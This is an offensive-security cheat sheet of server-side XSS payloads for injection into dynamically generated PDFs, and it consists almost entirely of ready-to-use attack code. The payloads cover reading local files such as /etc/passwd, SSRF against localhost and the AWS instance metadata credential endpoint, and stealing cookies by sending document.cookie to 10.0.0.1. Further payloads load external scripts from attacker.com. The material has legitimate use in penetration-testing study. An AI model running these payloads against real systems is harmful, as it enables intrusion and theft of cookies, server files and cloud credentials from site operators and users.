# XSS with Dynamic PDF

## XSS with Dynamic PDF <a href="#xss-with-dynamic-pdf" id="xss-with-dynamic-pdf"></a>

If the PDF file, which is created somewhere in the website, that is reflected our payloads, we can insert malicious code.

### Basic <a href="#basic" id="basic"></a>

```
<img src='x' onerror="document.write('test')">
<script>document.write('test')</script>

"><h1>XSS</h1>
```

### Path Disclosure <a href="#path-disclosure" id="path-disclosure"></a>

```
<img src='x' onerror="document.write(JSON.stringify(window.location))">
<script>document.write('<iframe src=\"' + window.location.href + '\"></iframe>')</script>
```

### LFI/RFI <a href="#lfirfi" id="lfirfi"></a>

```
<iframe src="file:///etc/passwd"></iframe>
<iframe src=file:///etc/passwd width=1000px height=1000px></iframe>
<iframe src=file:///var/www/html/index.php width=1000px height=1000px></iframe>
<iframe src="http://localhost:3000/index.html"></iframe>
<iframe src="http://localhost/server-status" height="1000" width="1000"></iframe>

<img src='x' onerror="document.write('<iframe src=file:///etc/passwd></iframe>')">
```

### LFI/RFI (XHR request) <a href="#lfirfi-xhr-request" id="lfirfi-xhr-request"></a>

```
<script>
    x = new XMLHttpRequest();
    x.onload = function() {
        document.write(this.responseText)
    };
    x.open("GET", "file:///etc/passwd");
    x.send();
</script>
```

### Cookie Hijacking <a href="#cookie-hijacking" id="cookie-hijacking"></a>

```
<img src=x onerror="location.href='http://10.0.0.1/?cookie='+ document.cookie">
```

### External Scripts <a href="#external-scripts" id="external-scripts"></a>

```
<script src="http://attacker.com/test.js"></script>

<img src='x' onerror="document.write('<script src=\"http://10.0.0.1/test.js\"></script>')" />
```

### AWS Instances <a href="#aws-instances" id="aws-instances"></a>

```
<iframe src="http://169.254.169.254/latest/dynamic/instance-identity/" height=1000px width=1000px></iframe>
<iframe src="http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance" height=1000px width=1000px></iframe>
```

### wkhtmltopdf <a href="#wkhtmltopdf" id="wkhtmltopdf"></a>

If the website uses “wkhtmltopdf”, please also refer to [this page](https://exploit-notes.hdks.org/exploit/web/wkhtmltopdf-ssrf/).

### References <a href="#references" id="references"></a>

* [HackTricks](https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf)